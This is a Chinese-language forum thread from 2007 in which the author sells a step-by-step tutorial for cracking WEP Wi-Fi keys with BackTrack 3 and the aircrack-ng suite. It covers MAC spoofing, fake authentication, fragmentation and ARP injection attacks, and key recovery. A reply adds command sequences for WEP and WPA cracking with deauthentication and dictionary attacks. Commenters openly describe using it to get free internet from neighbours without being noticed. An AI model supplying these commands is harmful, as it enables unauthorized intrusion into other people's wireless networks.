西班牙华人网 西华论坛

 找回密码
 立即注册
搜索
查看: 5688|回复: 81
收起左侧

免费了!WEP加密无线网络的破解

[复制链接]
发表于 2007-12-26 13:41:36 | 显示全部楼层 |阅读模式
首先申明本人不是黑客,出于兴趣爱好和交朋识友才发此贴,此贴仅用于交流使用.图片内容并非都是出自本人原创,本人只是借来编辑了一下........
好了,开始了........
破解之前首先你要准备以下东西:
a.一张刻录好的用于破解的光盘或者能够启动BT3的其他介质或虚拟机,用于破解的软件有很多,个人推荐使用BT3.下载地址购买本贴后即可显示。
b.一台用于破解的电脑,最好是笔记本,能够运行本教程使用的光盘的笔记本见楼下。
c.支持破解的网卡一个,如果你的笔记本自带的网卡不支持,你可以去买一个或者借一个列表(见4楼)中的usb网卡。
由于部分图片不能显示,要word格式或者PDF格式的朋友给我发站内消息留下信箱
准备工作
下载BT3用刻录软件将iso文件写入光盘,下载地址如下
Description: CD Image
Size: ~ 700 MB
MD5: 04ed8742fc8facd1ecc8c9f6f567c116
SHA: 70c33e0aa75a978b8a87a207bf488ecec8d10a87
Mirrors:
ftp://ftp.heanet.ie/mirrors/backtrack/bt3b141207.iso
ftp://backtrack.mirrors.skynet.be/pub/backtrack/bt3b141207.iso
http://ftp.cc.uoc.gr/mirrors/linux/backtrack/bt3b141207.isoftp://ftp.cc.uoc.gr/mirrors/linux/backtrack/bt3b141207.isohttp://backtrack.mirrors.skynet.be/pub/backtrack/bt3b141207.iso
http://mirror.switch.ch/ftp/mirror/backtrack/bt3b141207.iso
http://ftp.belnet.be/mirror/backtrack/bt3b141207.iso
http://backtrack.unixheads.org/
http://devsn.org/mirror/backtrack3/bt3b141207.iso
http://ftp.heanet.ie/mirrors/backtrack/bt3b141207.iso
Torrent: http://www.remote-exploit.org/bt3b141207.iso.torrent

实验方案
1.设置无线网卡MAC地址。
2.用airmon-ng让网卡进入monitor 模式
3.用airodump-ng找到你要破解的无线网络的Essid,bssid and channel.
4.重新让你的网卡进入monitor 模式,只监视你要破解的无线网络所用的channel.
5使用aireplay-ng在实验AP上产生虚假认证( fake authentication)。
6.使用fragmentation attack来获得PRGA。
7.使用上一步获得的PRGA用packetforge-ng 工具来生成一个arp包。
8.再次用airodump-ng来收集需要的IVS数据
9.使用第7步得到的arp来注入攻击
10.用aircrack-ng破解


详细步骤

把光盘放入光驱,重新启动电脑,选择从光驱启动,进入bt3的环境,这步你该会吧。

1.设置无线网卡MAC地址
  1.1 打开一个shell(在窗口左下角),输入如下命令ifconfig -a,结果见下图

                               
登录/注册后可看大图

其中rausb0是我的无线网卡名,也许你的是wifi0,后面的命令不能照搬,记得换名字,在后面步骤中我用 你的网卡名  代替 rausb0
  1.2 输入命令macchanger -m 00:11:22:33:44:55 rausb0把无线网卡mac地址改成00:11:22:33:44:55,因为后面经常要用到,这个方便输入,而且是个虚假地址,就算被记录也没问题 :)

2.用airmon-ng让网卡进入monitor 模式
   2.1输入命令 ifconfig -a 你的网卡名 up ,加载你的无线网卡
   2.2输入命令 airmon-ng start 你的网卡名 ,让你的网卡进入monitor模式
3.用airodump-ng找到你要破解的无线网络的Essid,bssid and channel.
    重新开第二个shell窗口,输入命令  airodump-ng -w capture 你的网卡名 ,其中capture 为抓包文件名,你可以任意指定,后面我用 抓包文件名 来代替。

你得到的图片应该与下面相似。注意图中的注释哦,后面会出现许多次  要破解的ESSID 对应的BSSID 对应的Channel ,你要知道该在这里找!我想这里的ESSID你应该很熟悉吧?对了!它就是你在windows底下能看到的无线网络名,看到千百次却无法连上的,记得挑一个信号强的哦.

                               
登录/注册后可看大图


4.重新让你的网卡进入monitor 模式,只监视你要破解的无线网络所用的channel.
   4.1输入命令 airmon-ng  stop 你的网卡名 ,先让你的无线网卡退出monitor模式
   4.2输入命令 ifconfig -a 你的网卡名 up ,重新加载你的网卡
 4.3输入命名 airmon-ng start 你的网卡名 对应的频道 ,让网卡只监听你要破解的网络eg对应的频道

                               
登录/注册后可看大图


5.使用aireplay-ng在实验AP上产生虚假认证( fake authentication)
  开第三个shell,输入命令
  aireplay-ng -1 0 -e 要破解的ESSID  -a 对应的BSSID  -h 00:11:22:33:44: 55 你的网卡名
当你得到"Assoocation successful" ,表明你虚假认证成功.如下图

                               
登录/注册后可看大图

6.使用fragmentation attack来获得PRGA。
  在第三个shell窗口中如入如下命令 
  aireplay-ng -5 -b 对应的BSSID  -h 00:11:22:33:44: 55 你的网卡名  或者
  aireplay-ng -4 -b 对应的BSSID  -h 00:11:22:33:44: 55 你的网卡名
 这一步的目的是获得一个xor文件,如果顺利,你将看到如下图片

                               
登录/注册后可看大图

 输入"Y",回车
 如果你用的是aireplay-ng -5,你将看到如下图片

                               
登录/注册后可看大图

 如果你用的是aireplay-ng -4,你看到的图片将不同,但是等100%guess 完成之后,你能看到"saving keystream......",一样表示你这一步成功了.
7.使用上一步获得的PRGA用packetforge-ng 工具来生成一个arp包。
  7.1输入 ls ,可以看到Xor文件名,很长,记得别敲错,建议用复制,粘贴到7.2的命令中
  你将看到类似如下的图片
  

                               
登录/注册后可看大图

    7.2 输入如下命令生成一个用来ARP攻击的文件.
  packetforge-ng -0 -a 对应的BSSID  -h 00:11:22:33:44: 55 -k 255.255.255.255 -l 255.255.255.255 -y 7.1中看到的文件名(包括后缀XOR) -w ARP文件名
  其中ARP文件名可以任意指定,我一般就叫arp,后面第9步中要用到这个文件的.
    请参考下图

                               
登录/注册后可看大图

8.再次用airodump-ng来收集需要的IVS数据
  在第二个shell窗口中输入 airodump-ng -c 对应的频道 --bssid 对应的BSSID -w 抓包文件 你的网卡名 ,开始抓包.注意bssid前面有两个"-" .

9.使用第7步得到的arp来注入攻击
 在第3个shell窗口中输入如下命令 aireplay-ng -2  –r ARP文件名 你的网卡名 
 你将看到类似如下的画面

                               
登录/注册后可看大图

 输入 "Y",回车,发包攻击开始,如下图

                               
登录/注册后可看大图

回到第二个shell窗口,如果你看到抓到的DATA每秒速度有几十甚至接近500的时候,去喝杯咖啡等着抓包到30万吧.

                               
登录/注册后可看大图


10.用aircrack-ng破解
 等到抓包到30万(其实12万就可以了,抓的破解的就快),按下 CTRL + C 停止抓包,
输入命令 ls 察看你的抓包文件名,一般应该是在第8步中的"抓包文件"后面加上"-01.cap"或者"-02.cap",例如 "capture-01.cap"
   接着输入命令 aircrack-ng -z 抓包文件名-01.cap   或者
   aircrack-ng -x 抓包文件名-01.cap  就可以破译出密码了!
  
如下图

                               
登录/注册后可看大图

  需要注意的是,如果你得不到ASCII码 你把得到的16进制码(类似图中的"63:6A:63:68...")中间的分号去掉,一样可以当密码输入.

--------------------------------------------------------
[ 本帖最后由 nobestname 于 2008-7-8 11:52 编辑 ]

评分

参与人数 2银子 +689 威望 +2 魅力 +5 鲜花 +3 收起 理由
Alejandro + 489 + 2 + 5 + 3 好文章!特此授予社区奖励
单身贵族 + 200 好文章!特此奖励社区货币

查看全部评分

 楼主| 发表于 2007-12-26 13:45:00 | 显示全部楼层

支持运行本光盘的笔记本

请参见
http://www.eurospain.org/forum/v ... page%3D1#pid1781642

[ 本帖最后由 nobestname 于 2007-12-26 17:52 编辑 ]
回复 支持 反对

使用道具 举报

 楼主| 发表于 2007-12-26 13:45:45 | 显示全部楼层
请参见
http://www.eurospain.org/forum/v ... page%3D1#pid1781642

[ 本帖最后由 nobestname 于 2007-12-26 17:53 编辑 ]
回复 支持 反对

使用道具 举报

 楼主| 发表于 2007-12-26 13:46:15 | 显示全部楼层

支持破解的网卡列表

请参见
http://www.eurospain.org/forum/v ... page%3D1#pid1781642

[ 本帖最后由 nobestname 于 2007-12-26 17:53 编辑 ]
回复 支持 反对

使用道具 举报

 楼主| 发表于 2007-12-26 23:53:32 | 显示全部楼层
这么好的帖子怎么没人顶啊!!我可是一天没怎么干工作写出来的啊!!!
回复 支持 反对

使用道具 举报

发表于 2007-12-27 01:34:06 | 显示全部楼层
好复杂啊`~~.............弄不懂
回复 支持 反对

使用道具 举报

发表于 2007-12-27 07:06:29 | 显示全部楼层
买了……够黑~~~~~~~~~~~
不过这只能破解WEP的,其他加密方式就比较难了。还好西班牙人的电脑水平不高,破解的话足够省好多钱了~~~~~~~~~
再加上普通路由又没有历史纪录,只要不是太过分,被黑的话都发现不了~~~~
偶在国内的路由整天被攻击,日死。。。。。。。。不过偶用的其他的加密方式,我看他们有多大本事。。。。。。。。。。。。
回复 支持 反对

使用道具 举报

 楼主| 发表于 2007-12-27 11:38:02 | 显示全部楼层
wpa2也不安全啊,只是破解起来比较耗时间罢了。
回复 支持 反对

使用道具 举报

 楼主| 发表于 2007-12-28 10:43:13 | 显示全部楼层
购买本贴的第10个人是 xxiao,如果有意要学的话,请联系我。
回复 支持 反对

使用道具 举报

发表于 2007-12-28 12:58:13 | 显示全部楼层
bucuo.xin ku lou zhu le
回复 支持 反对

使用道具 举报

发表于 2007-12-28 14:24:07 | 显示全部楼层
WEP Crack
察看網卡有無支援
iwconfig
啟動網卡為監聽模式
airmon-ng start rausb0
掃瞄現有無線網路
airodump-ng rausb0
掃瞄並鎖定channel x 蒐集iv值 存到檔案"wep"
airodump-ng --ivs -w wep --channel x rausb0
收集真實ARP 製造大量偽ARP到AP
aireplay-ng -3 -b AP_MAC -h ST_MAC -x 600 rausb0
若收集不到ARP 則製造斷線訊框
aireplay-ng -0 10 -a AP_MAC rausb0
待封包收集足夠 進行crack
aircrack -x -n 64 wep-01.ivs

注意事項:
網卡晶片組需為Atheros

WPA Crack
察看網卡有無支援
iwconfig
啟動網卡為監聽模式
airmon-ng start rausb0
掃瞄現有無線網路
airodump-ng rausb0
掃瞄並鎖定channel x 蒐集handshack值 存到檔案"wpa"
airodump-ng -w wpa --channel x rausb0
若收集不到handshack 則製造斷線訊框
aireplay-ng -0 10 -a AP_MAC rausb0
解壓縮字典檔zcat /pentest/password/dictionaries/wordlist.txt.Z > password.txt
待收集到handshack 進行crack
aircrack -w password.txt -0 wpa-01.cap

ex.cisco aironet系列(資策會有)
or D-link DWL-G122 H/W:B1 (c1不可使用)
回复 支持 反对

使用道具 举报

发表于 2007-12-28 19:28:59 | 显示全部楼层
...........................这帖买早了  55555555555555555555从买行不  哈哈
回复 支持 反对

使用道具 举报

发表于 2007-12-28 19:30:56 | 显示全部楼层
要不俺给你2650积分把前50名都包了 杂样????嘿嘿
回复 支持 反对

使用道具 举报

 楼主| 发表于 2007-12-28 19:41:19 | 显示全部楼层
我被你打动了,呵呵,你发消息告诉我你QQ或者msn吧
回复 支持 反对

使用道具 举报

发表于 2007-12-28 21:00:53 | 显示全部楼层
: 我看不懂啊
我也把前50名包了
回复 支持 反对

使用道具 举报

发表于 2007-12-30 09:09:20 | 显示全部楼层

回复 #15 戀戀︷星梦缘 的帖子

: 你只能包50名~100名了。。。。。。。。。。
回复 支持 反对

使用道具 举报

发表于 2007-12-31 00:20:22 | 显示全部楼层
嘿嘿`!  谢啦...................
原帖由 nobestname 于 2007-12-28 18:41 发表
我被你打动了,呵呵,你发消息告诉我你QQ或者msn吧
回复 支持 反对

使用道具 举报

发表于 2007-12-31 00:21:02 | 显示全部楼层
不需要买任何东西吧~???
回复 支持 反对

使用道具 举报

发表于 2007-12-31 08:49:48 | 显示全部楼层

回复 #18 星沉海底 的帖子

: 要……要买USB的无线网卡。。。。。。。。。。。。。
回复 支持 反对

使用道具 举报

发表于 2007-12-31 09:00:43 | 显示全部楼层
BT3= BackTrack 3 Beta

LZ。。。把图片修复下吧。。。。。。。。。。。
向高手致敬。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关于我们|广告服务|免责声明|小黑屋|友情链接|Archiver|联系我们|手机版|西班牙华人网 西华论坛 ( 蜀ICP备05006459号 )

GMT+2, 2024-4-29 06:41 , Processed in 0.020748 second(s), 8 queries , Gzip On, Redis On.

Powered by Discuz! X3.4 Licensed

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表